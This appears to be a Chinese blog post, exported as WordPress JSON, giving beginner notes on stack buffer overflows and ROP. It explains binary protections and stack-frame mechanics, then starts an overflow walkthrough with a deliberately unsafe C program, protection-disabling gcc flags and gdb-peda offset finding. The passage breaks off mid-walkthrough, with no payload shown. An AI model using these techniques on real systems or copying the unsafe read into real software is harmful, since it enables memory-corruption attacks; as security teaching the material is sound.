{"id":1501,"date":"2020-05-08T03:27:41","date_gmt":"2020-05-07T19:27:41","guid":{"rendered":"https:\/\/0self.mnihyc.com\/blog\/?p=1501"},"modified":"2020-05-08T18:04:17","modified_gmt":"2020-05-08T10:04:17","slug":"%e6%a0%88%e6%ba%a2%e5%87%ba-%e5%88%9d%e7%ba%a7-rop-%e5%ad%a6%e4%b9%a0%e8%ae%b0%e5%bd%95","status":"publish","type":"post","link":"https:\/\/0self.mnihyc.com\/blog\/archives\/1501","title":{"rendered":"\u6808\u6ea2\u51fa \u2014\u2014 \u521d\u7ea7 ROP \u5b66\u4e60\u8bb0\u5f55"},"content":{"rendered":"<p>\u9996\u53d1 CTF \u540e\u518d\u6b21\u6df1\u523b\u4f53\u4f1a\u5230\u4e86\u81ea\u5df1\u4ee5\u524d\u5bf9<strong>\u6808\u6ea2\u51fa<\/strong>\u7684\u7406\u89e3\u662f\u5982\u6b64\u7684\u4e0d\u6df1\u523b\uff0c\u6545\u8d81\u7740\u5269\u4e0b\u8fd9\u6ca1\u51e0\u5929\u7684\u65f6\u95f4<span style=\"color: #ffffff;\"><del>\uff08\u4e0d\u662f\u5e94\u8be5\u62ff\u6765\u8865\u4f5c\u4e1a\u5417\uff1f\uff09<\/del><\/span>\u5b66\u4e60\u4e86\u4e00\u4e0b\u521d\u7ea7 ROP \u7684\u539f\u7406\u53ca\u5e94\u7528\u3002<\/p>\n<p>\u540c\u6837\u56e0\u4e3a\u662f\u521d\u7ea7\u5b66\u4e60\u7ecf\u9a8c\uff0c\u6545\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u8def\uff08\uff08<\/p>\n<p>&nbsp;<\/p>\n<hr \/>\n<p>&nbsp;<\/p>\n<p><!--more--><\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li>\n<h3>\u76ee\u5f55<\/h3>\n<ul>\n<li>\u9884\u5907\u77e5\u8bc6\n<ul>\n<li><a href=\"#t_pre\"><strong>\u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236<\/strong><\/a><\/li>\n<li><a href=\"#t_prestack\"><strong>\u51fd\u6570\u7684\u6808\u64cd\u4f5c<\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<li>\u5f00\u59cbpwn\n<ul>\n<li><strong><a href=\"#t_aslronly\">\u4ec5\u5f00\u542f ASLR<\/a><\/strong><\/li>\n<li><a href=\"#t_withnx\"><strong>ASLR + NX<\/strong><\/a><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>\u5f85\u5751&#8230;&#8230;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_pre\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>\u6808\u6ea2\u51fa\u4fdd\u62a4\u673a\u5236<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u6709\u8fd9\u6837\u4e00\u6bb5\u5c0f\u7a0b\u5e8f<\/p>\n<pre class=\"lang:default decode:true \">#include &lt;unistd.h&gt;\r\n#include &lt;stdio.h&gt;\r\nint main()\r\n{\r\n        int i=0;\r\n        char buf[64];\r\n        read(0,buf,0x200);\r\n        printf(\"%d\\n\",i);\r\n        return 0;\r\n}\r\n<\/pre>\n<p>\u7528 <span class=\"lang:default decode:true  crayon-inline \">gcc temp.c -o temp<\/span> \u7f16\u8bd1\u5b83\uff0c\u5e76 <span class=\"lang:default decode:true  crayon-inline \">python3 -c &#8216;from pwn import *; ELF(&#8220;temp&#8221;)&#8217;<\/span> \u67e5\u770b\u5b83\u7684\u4fdd\u62a4\u4fe1\u606f<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1504\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png\" alt=\"\" width=\"507\" height=\"107\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B.png 507w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B-300x63.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/N_5N@AB6@O2HUN6M1H6B-150x32.png 150w\" sizes=\"auto, (max-width: 507px) 100vw, 507px\" \/><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u9ed8\u8ba4\u53c2\u6570\u5c31\u662f\u00a0 \u4fdd\u00a0 \u62a4\u00a0 \u5168\u00a0 \u5f00\uff0c\u4e0d\u5bb9\u6613\u653b\u7834<\/p>\n<ul>\n<li>\n<p><strong>RELRO (<span class=\"st\">Relocation Read-Only<\/span>) <\/strong>\u5206\u4e3a\u4e24\u79cd\uff0c\u7b80\u5355\u6765\u8bf4\u5c31\u662f Partial RELRO \u7684 GOT \u8868\u4ecd\u53ef\u5199\uff08PLT \u8868\u4e0d\u53ef\u5199\uff09\uff0c\u800c Full RELRO \u7684 GOT \u8868\u4e5f\u4e0d\u53ef\u5199\u3002<\/p>\n<\/li>\n<li><strong>Stack Canary<\/strong> found \u5373\u6808\u4fdd\u62a4\uff0c\u8be5\u65b9\u6cd5\u4f1a\u5728\u521b\u5efa\u67d0\u65b0\u7684\u6808\u5e27\u65f6\u63d2\u5165\u4e00\u4e2a Canary \u6807\u8bb0\uff08\u53ef\u4ee5\u8ba4\u4e3a\u662f\u968f\u673a\u7684\uff09\uff0c\u5e76\u5728\u9000\u51fa\u8be5\u6808\u5e27\uff08\u5373 ret\uff09\u65f6\u68c0\u67e5\u8fd9\u4e2a\u6807\u8bb0\u662f\u5426\u88ab\u4fee\u6539\u3002\u82e5\u88ab\u4fee\u6539\uff0c\u5219\u7ec8\u6b62\u7a0b\u5e8f\u5e76\u62a5\u9519\u3002\u540c\u65f6\u8be5\u65b9\u6cd5\u6709\u53ef\u80fd\u8c03\u6362\u4e00\u4e9b\u53c2\u6570\u5728\u5185\u5b58\u4e2d\u7684\u4f4d\u7f6e\uff0c\u4ee5\u907f\u514d\u6f5c\u5728\u7684\u6ea2\u51fa\u98ce\u9669\u3002\u6b64\u65b9\u6cd5\u5728 MSVC \u7cfb\u5217\u4e0a\u88ab\u79f0\u4f5c \/GX\u3002<\/li>\n<li><strong>NX (<span class=\"st\">No-Execute<\/span>)<\/strong> enabled \u5373\u53d6\u6d88\u6808\u6570\u636e\u5757\u7684 X\uff08\u6267\u884c\uff09\u6743\u9650\uff0c\u8fd9\u610f\u5473\u7740\u65e0\u6cd5\u901a\u8fc7\u4f20\u7edf\u65b9\u6cd5\uff08jmp esp \u7b49\uff09\u6765\u6267\u884c shellcode\u3002\u6b64\u65b9\u6cd5\u5728 Windows \u4e0a\u88ab\u79f0\u4f5c <strong>DEP (<span class=\"st\">Data Execution Prevention<\/span>)<\/strong>\u3002<\/li>\n<li><strong>ASLR (<span class=\"ILfuVd\"><span class=\"e24Kjd\">Address Space Layout Randomization<\/span><\/span>)<\/strong> \u4e00\u822c\u7cfb\u7edf\u9ed8\u8ba4\u5f00\u542f\u3002\u8fd9\u4f1a\u4f7f\u5f97\u6bcf\u6b21\u52a0\u8f7d\u7684\u52a8\u6001\u5e93\uff08libc \u7b49\uff09\u57fa\u5740\u548c\u6808\u57fa\u5740\u7684\u4e2d\u95f4\u4f4d\u6570\u52a8\u6001\u53d8\u5316\uff08\u540e\u4e09\u4f4d\u4e0d\u53d8\uff09\u3002\u53ef\u4ee5\u901a\u8fc7 <span class=\"lang:default decode:true  crayon-inline\">cat \/proc\/sys\/kernel\/randomize_va_space<\/span> \u67e5\u770b\u5f00\u542f\u72b6\u6001\uff0c0 \u5219\u662f\u5173\u95ed\uff0c2 \u5219\u662f\u540c\u65f6\u968f\u673a\u5316\u5806\u6808\u3002<\/li>\n<li><strong>PIE (<span class=\"st\">Position Independent Executable<\/span>)<\/strong> enabled \u5373\u771f\u6b63\u610f\u4e49\u4e0a\u7684\u5730\u5740\u968f\u673a\u5316\u3002\u5b83\u5728 ASLR \u5f00\u542f\u7684\u57fa\u7840\u4e0a\uff0c\u5bf9\u7a0b\u5e8f\u7684\u57fa\u5740\u4e5f\u8fdb\u884c\u4e86\u968f\u673a\u5316\uff0c\u8fd9\u610f\u5473\u7740\u65e0\u6cd5\u901a\u8fc7\u786c\u7f16\u7801 PLT\/GOT \u4e2d\u7684\u51fd\u6570\u5730\u5740\u6765\u8fdb\u884c\u64cd\u4f5c\u3002<\/li>\n<li><strong>Fortify<\/strong> \u5373\u5c3d\u53ef\u80fd\u5730\u667a\u80fd\u66ff\u6362 strcpy \u7b49\u53ef\u80fd\u9020\u6210\u6ea2\u51fa\u7684\u51fd\u6570\u81f3\u5b89\u5168\u7684 strncpy\uff0c\u524d\u63d0\u662f\u5f00\u542f O2 \u53ca\u4ee5\u4e0a\u7ea7\u522b\u4f18\u5316\u3002<\/li>\n<li><strong>\u7b49\u7b49\u7b49\u7b49<\/strong><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_prestack\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>\u51fd\u6570\u7684\u6808\u64cd\u4f5c<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u90fd\u77e5\u9053\u7cfb\u7edf\u662f\u901a\u8fc7\u201c\u6808\u64cd\u4f5c\u201d\u6765\u5b9e\u73b0\u51fd\u6570\u7684\u8c03\u7528\u7684\uff0c\u4f46\u662f\u5177\u4f53\u6765\u8bf4\u53c8\u5982\u4f55\u64cd\u4f5c\u7684\uff1f\u6808\u7684\u7ed3\u6784\u5982\u4f55\uff1f<\/p>\n<p>x86 \u5e73\u53f0\u4e0b\uff0cCPU \u6709 eax, ebx, ecx, edx, esi, edi, ebp, esp \u7b49 32-bit \u5bc4\u5b58\u5668\uff0c\u5176\u4e2d eip, ebp, esp \u5c31\u548c\u51fd\u6570\u7684\u6808\u64cd\u4f5c\u6709\u83ab\u5927\u7684\u5173\u7cfb\u3002\uff08\u5728 x86-64 CPU \u4e0b\uff0c\u5b83\u4eec\u5206\u522b\u88ab\u79f0\u4f5c rax, rbx, rcx, rdx, rsi, rdi, rbp, rsp\uff0c\u540c\u65f6\u65b0\u589e R8~R15 8 \u4e2a 64-bit \u5bc4\u5b58\u5668\uff0ceip \u88ab\u79f0\u4f5c rip\uff09<\/p>\n<p>RIP (Instruction Pointer) \u662f\u4e00\u4e2a\u81f3\u5173\u91cd\u8981\u7684\u5bc4\u5b58\u5668\uff0c\u5b83\u7684\u503c\u4e3a CPU \u4e0b\u4e00\u6761\u5c06\u8981\u6267\u884c\u7684\u6307\u4ee4\u7684\u5730\u5740\u3002<\/p>\n<p>RBP (Base Pointer) \u5728\u6808\u64cd\u4f5c\u4e2d\uff0c\u59cb\u7ec8\u6307\u5411\u5f53\u524d\u6808\u5e27\u7684\u8d77\u59cb\u4f4d\u7f6e\u3002<\/p>\n<p>RSP (Stack Pointer) \u5728\u6808\u64cd\u4f5c\u4e2d\uff0c\u59cb\u7ec8\u6307\u5411\u5f53\u524d\u6808\u5e27\u7684\u6700\u540e\u4e00\u4e2a\u5143\u7d20\u3002<\/p>\n<p>\u7531\u4e8e\u6808\u662f\u5178\u578b\u7684 FILO\uff08First In, Last Out\uff09\u5373\u5148\u8fdb\u540e\u51fa\u7ed3\u6784\uff0c\u6240\u4ee5\u6709\u4e00\u79cd\u8bf4\u6cd5\u201c\u53c2\u6570\u662f\u4ece\u53f3\u5f80\u5de6\u5165\u6808\u7684\u201d\uff0c\u5373\u4e3a\u4e86\u4fdd\u8bc1\u7b2c\u51e0\u4e2a pop \u53d6\u5230\u7684\u5c31\u662f\u7b2c\u51e0\u4e2a\u53c2\u6570\uff0c\u5165\u6808\u65f6\u53c2\u6570\u5fc5\u987b\u9006\u5e8f\u5165\u6808\u3002<\/p>\n<p>\u503c\u5f97\u6ce8\u610f\u7684\u662f\uff0c\u5728 x86-64 \u7cfb\u7edf\u4e2d\uff0c\u7531\u4e8e\u5bc4\u5b58\u5668\u6570\u91cf\u53d8\u591a\uff0c\u6240\u4ee5\u4f20\u9012\u53c2\u6570\u9996\u5148\u9760\u7684\u662f RDI\u3001RSI\u3001RDX\u3001RCX\u3001R8\u3001R9 \u8fd9\u516d\u4e2a\u5bc4\u5b58\u5668\uff0c\u5b58\u6ee1\u4e86\u624d\u4f1a\u5f00\u59cb\u5165\u6808\u3002<\/p>\n<p>\u63a5\u4e0b\u6765\u770b\u770b\u5f53\u8c03\u7528\u4e00\u4e2a\u51fd\u6570\u65f6\uff0c\u7cfb\u7edf\u5bf9\u6808\u505a\u4e86\u4ec0\u4e48\u64cd\u4f5c\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1507\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/ODLU@4XB0R5Q3EUM.png\" alt=\"\" width=\"841\" height=\"521\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/ODLU@4XB0R5Q3EUM.png 841w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/ODLU@4XB0R5Q3EUM-300x186.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/ODLU@4XB0R5Q3EUM-150x93.png 150w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/ODLU@4XB0R5Q3EUM-768x476.png 768w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/ODLU@4XB0R5Q3EUM-825x510.png 825w\" sizes=\"auto, (max-width: 841px) 100vw, 841px\" \/><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\uff0c\u8c03\u7528\u4e00\u4e2a\u51fd\u6570\u65f6\uff0c\u5c31\u76f8\u5f53\u4e8e\u4fdd\u5b58\u5f53\u524d\u7684\u51fd\u6570\u72b6\u6001\u4e8e Caller&#8217;s Stack Frame \u4e2d\uff0c\u5e76\u5411\u4f4e\u4f4d\u5730\u5740\u6269\u5c55\u51fa\u65b0\u7684 Callee&#8217;s Stack Frame \u8fdb\u884c\u4f7f\u7528\u3002<\/p>\n<p>\u5177\u4f53\u6765\u8bf4\uff0c\u53ef\u4ee5\u5206\u4e3a\u4ee5\u4e0b\u6b65\u9aa4\uff1a<\/p>\n<p>\u9996\u5148\uff0c\u82e5\u6709\u53c2\u6570\uff0c\u5219 push \u8fdb\u5f53\u524d\u6808\u5e27\uff08\u84dd\u8272\u90e8\u5206\uff09\u4e2d<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1509\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/OQ1VQ8MW7RF5Y8F0_ZR.png\" alt=\"\" width=\"544\" height=\"517\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/OQ1VQ8MW7RF5Y8F0_ZR.png 544w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/OQ1VQ8MW7RF5Y8F0_ZR-300x285.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/OQ1VQ8MW7RF5Y8F0_ZR-150x143.png 150w\" sizes=\"auto, (max-width: 544px) 100vw, 544px\" \/><\/p>\n<p>\u63a5\u7740\uff0c\u4f9d\u6b21\u628a\u5f53\u524d\u51fd\u6570\u7684\u4e0b\u4e00\u6761\u6307\u4ee4\uff08\u5f53\u505a Return Address\uff09\u548c\u5f53\u524d RBP \u7684\u503c push \u8fdb\u6808\u4e2d<\/p>\n<p>\u5728\u4f9d\u6b21\u5b8c\u6210\u4ee5\u4e0a\u4e24\u4e2a\u64cd\u4f5c\u540e\uff0c\u5c06 RBP \u66f4\u65b0\u81f3\u6808\u9876\uff08RSP\uff09\u4f4d\u7f6e<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1519\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/K9GRW0GKUUB13KH_WVL.png\" alt=\"\" width=\"416\" height=\"609\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/K9GRW0GKUUB13KH_WVL.png 416w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/K9GRW0GKUUB13KH_WVL-205x300.png 205w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/K9GRW0GKUUB13KH_WVL-102x150.png 102w\" sizes=\"auto, (max-width: 416px) 100vw, 416px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>\u8fd9\u6837\u5c31\u5b8c\u6210\u4e86\u4e00\u6b21 call \u7684\u64cd\u4f5c\uff0c\u5c31\u53ef\u4ee5\u5f00\u59cb\u6267\u884c\u88ab\u8c03\u7528\u51fd\u6570\u91cc\u7684\u4ee3\u7801\u4e86\u3002\u4e0d\u7ba1\u662f\u65b0\u5b9a\u4e49\u53d8\u91cf\u8fd8\u662f\u7ee7\u7eed\u8c03\u7528\u51fd\u6570\uff0cRSP \u5728\u8fd9\u4e2a\u8fc7\u7a0b\u4e2d\u59cb\u7ec8\u6307\u5411\u6808\u9876\u4f4d\u7f6e\uff0c\u503c\u4e0d\u65ad\u51cf\u5c0f\uff08\u5bf9\u5e94\u4ece\u9ad8\u5f80\u4f4e\u4f38\u5c55\uff09\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1517\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TKK328BMAV5SSRNGU8.png\" alt=\"\" width=\"418\" height=\"641\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TKK328BMAV5SSRNGU8.png 418w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TKK328BMAV5SSRNGU8-196x300.png 196w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TKK328BMAV5SSRNGU8-98x150.png 98w\" sizes=\"auto, (max-width: 418px) 100vw, 418px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>\u5728\u9000\u51fa\u51fd\u6570\u65f6\uff0c\u4fdd\u6301\u5806\u6808\u7684\u5e73\u8861\u662f\u5341\u5206\u91cd\u8981\u7684\uff08\u5373\u4e0e call \u6b64\u51fd\u6570\u65f6\u5806\u6808\u72b6\u6001\u76f8\u540c\uff09\u3002<\/p>\n<p>\u9996\u5148\u82e5\u6709\u5c40\u90e8\u53d8\u91cf\uff0c\u5219\u4f1a\u88ab\u76f4\u63a5\u5f39\u51fa\uff0c\u6b64\u65f6\u56de\u5230\u4e86\u4e0a\u4e24\u5f20\u56fe\u65f6\u7684\u72b6\u6001\u3002<\/p>\n<p>\u7136\u540e\u5c06 Caller&#8217;s RBP \u5f39\u51fa\uff0c\u5e76\u590d\u539f RBP \u81f3\u539f\u6765\u7684\u4f4d\u7f6e\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1512\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/UOBUG6R2910L0ZC.png\" alt=\"\" width=\"460\" height=\"567\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/UOBUG6R2910L0ZC.png 460w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/UOBUG6R2910L0ZC-243x300.png 243w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/UOBUG6R2910L0ZC-122x150.png 122w\" sizes=\"auto, (max-width: 460px) 100vw, 460px\" \/><\/p>\n<p>\u7136\u540e\u5173\u952e\u7684\u4e00\u6b65\u6765\u4e86\uff0c\u5c06\u6808\u4e2d\u7684 Return Address \u5f39\u7ed9 RIP\uff08\u7b49\u540c\u4e8e jmp\uff09\uff0cCPU \u7ee7\u7eed\u6267\u884c Caller \u51fd\u6570\u7684\u4e0b\u4e00\u8bed\u53e5\u5e76\u5b8c\u6210\u53c2\u6570\u9000\u6808\u64cd\u4f5c\uff0c\u7ed3\u675f\u540e\u6808\u72b6\u6001\u4e0e call \u4e4b\u524d\u65e0\u5f02\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1513\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/S9ILIE4FO_M4C6.png\" alt=\"\" width=\"442\" height=\"520\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/S9ILIE4FO_M4C6.png 442w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/S9ILIE4FO_M4C6-255x300.png 255w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/S9ILIE4FO_M4C6-128x150.png 128w\" sizes=\"auto, (max-width: 442px) 100vw, 442px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1521\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QNG5M6@GNC_EL4FGA3.png\" alt=\"\" width=\"403\" height=\"313\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QNG5M6@GNC_EL4FGA3.png 403w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QNG5M6@GNC_EL4FGA3-300x233.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/QNG5M6@GNC_EL4FGA3-150x117.png 150w\" sizes=\"auto, (max-width: 403px) 100vw, 403px\" \/><\/p>\n<p>\u8fd9\u6837\u5c31\u5b9e\u73b0\u4e86 call + leave + ret \u8c03\u7528\u51fd\u6570\u7684\u5168\u8fc7\u7a0b\uff08\u53c2\u6570\u7684\u5165\/\u9000\u6808\u5e76\u4e0d\u88ab\u5305\u62ec\u5728\u5176\u4e2d\uff09\u3002<\/p>\n<p>\u4e0d\u4e25\u8c28\u5730\u6765\u8bf4\uff0c\u53ef\u4ee5\u53d1\u73b0 call \u5176\u5b9e\u662f <span class=\"lang:default decode:true crayon-inline\">push rip; push rbp; mov rbp, rsp; jmp &lt;somewhere&gt;<\/span> \uff0cleave \u5176\u5b9e\u662f <span class=\"lang:default decode:true  crayon-inline \">mov rsp, rbp; pop rbp<\/span> \uff0cret \u5176\u5b9e\u662f <span class=\"lang:default decode:true  crayon-inline \">pop rip<\/span>\u00a0 \u3002<\/p>\n<p>&nbsp;<\/p>\n<p>\u90a3\u7f13\u51b2\u533a\u6ea2\u51fa\u662f\u600e\u4e48\u9020\u6210\u7684\uff1f<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1514\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/6MT25IWOHDZP327.png\" alt=\"\" width=\"587\" height=\"513\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/6MT25IWOHDZP327.png 587w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/6MT25IWOHDZP327-300x262.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/6MT25IWOHDZP327-150x131.png 150w\" sizes=\"auto, (max-width: 587px) 100vw, 587px\" \/><\/p>\n<p>\u5176\u5b9e\u662f\u56e0\u4e3a\u4e00\u5bf9\u5173\u952e\u7684\u77db\u76fe\u2014\u2014\u6808\u662f\u4ece\u9ad8\u4f4d\u5730\u5740\u5f80\u4f4e\u4f4d\u5730\u5740\u589e\u957f\u7684\uff0c\u800c\u7f13\u51b2\u533a\u662f\u4ece\u4f4e\u4f4d\u5730\u5740\u5f80\u9ad8\u4f4d\u5730\u5740\u586b\u5145\u7684\uff0c\u8fd9\u5c31\u5bfc\u81f4\u4e86\u7f13\u51b2\u533a\u6ea2\u51fa\u6709\u53ef\u80fd\u8986\u76d6\u5230\u6b63\u5e38\u7684\u6808\u5e27\uff0c\u4ece\u800c\u4f7f\u63a7\u5236\u7a0b\u5e8f\u7684\u6d41\u7a0b\u6210\u4e3a\u53ef\u80fd\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><a id=\"t_aslronly\"><\/a>\u00a0<\/p>\n<hr \/>\n<ul>\n<li>\n<h3><strong>\u4ec5\u5f00\u542f ASLR<\/strong><\/h3>\n<\/li>\n<\/ul>\n<p>\u4f7f\u7528 <span class=\"lang:default decode:true  crayon-inline\">gcc temp.c -o temp -fno-stack-protector -no-pie -z execstack<\/span> \u7f16\u8bd1<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1506\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/DJH0CWMZIA955UN3OX0E.png\" alt=\"\" width=\"508\" height=\"126\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/DJH0CWMZIA955UN3OX0E.png 508w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/DJH0CWMZIA955UN3OX0E-300x74.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/DJH0CWMZIA955UN3OX0E-150x37.png 150w\" sizes=\"auto, (max-width: 508px) 100vw, 508px\" \/><\/p>\n<p>\u6055\u6211\u76f4\u8a00\uff0c\u8fd9\u4e0d\u662f\u7231\u548b\u641e\u5c31\u548b\u641e\uff1f\uff1f\uff08<\/p>\n<p>\u6765\u4e00\u6ce2\u57fa\u672c\u64cd\u4f5c\uff1a<\/p>\n<p>\u6253\u5f00 gdb-peda<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1524\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TESLRKDR65MRRO3PCVY.png\" alt=\"\" width=\"629\" height=\"260\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TESLRKDR65MRRO3PCVY.png 629w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TESLRKDR65MRRO3PCVY-300x124.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TESLRKDR65MRRO3PCVY-150x62.png 150w\" sizes=\"auto, (max-width: 629px) 100vw, 629px\" \/><\/p>\n<p>\u521b\u5efa pattern<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1525\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/JIP_C1BRPZSH19F2P02A.png\" alt=\"\" width=\"399\" height=\"35\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/JIP_C1BRPZSH19F2P02A.png 399w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/JIP_C1BRPZSH19F2P02A-300x26.png 300w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/JIP_C1BRPZSH19F2P02A-150x13.png 150w\" sizes=\"auto, (max-width: 399px) 100vw, 399px\" \/><\/p>\n<p>\u76f4\u63a5\u5f00\u5927<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1526\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RZOU707S0FB_KDUVDXVY.png\" alt=\"\" width=\"857\" height=\"995\" srcset=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RZOU707S0FB_KDUVDXVY.png 857w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RZOU707S0FB_KDUVDXVY-258x300.png 258w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RZOU707S0FB_KDUVDXVY-129x150.png 129w, https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/RZOU707S0FB_KDUVDXVY-768x892.png 768w\" sizes=\"auto, (max-width: 857px) 100vw, 857px\" \/><\/p>\n<p>\u53ef\u4ee5\u770b\u5230\u6b7b\u5728\u4e86 0x400578 &lt;main+65&gt;: ret \u8fd9\u91cc<\/p>\n<p>\u6b64\u65f6 RSP \u4ecd\u6307\u5411 Return Address\uff0c\u56e0\u4e3a ret \u4f7f\u5f97 RIP \u6307\u5411\u4e86\u4e00\u4e2a\u975e\u6cd5\u7684\u5185\u5b58\u5730\u5740\uff0c\u6240\u4ee5 RSP \u4e0a\u79fb\u7684\u64cd\u4f5c\u5e76\u6ca1\u6709\u5b8c\u6210\u3002\uff08\u8fd9\u5728 x86 \u7cfb\u7edf\u91cc\u662f\u4e0d\u4f1a\u53d1\u751f\u7684\uff09<\/p>\n<p>\u6240\u4ee5\u8bf4\u53ea\u9700\u8981\u627e\u5230 RSP \u7684 offset \u5c31\u53ef\u4ee5\u77e5\u9053\u6ea2\u51fa\u4f4d\u70b9\u4e86\u3002<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1527\" src=\"https:\/\/0self.mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/U5C9CQ5D63WKN9F2.png\" alt=\"\" width=\"291\" height=\"63\" 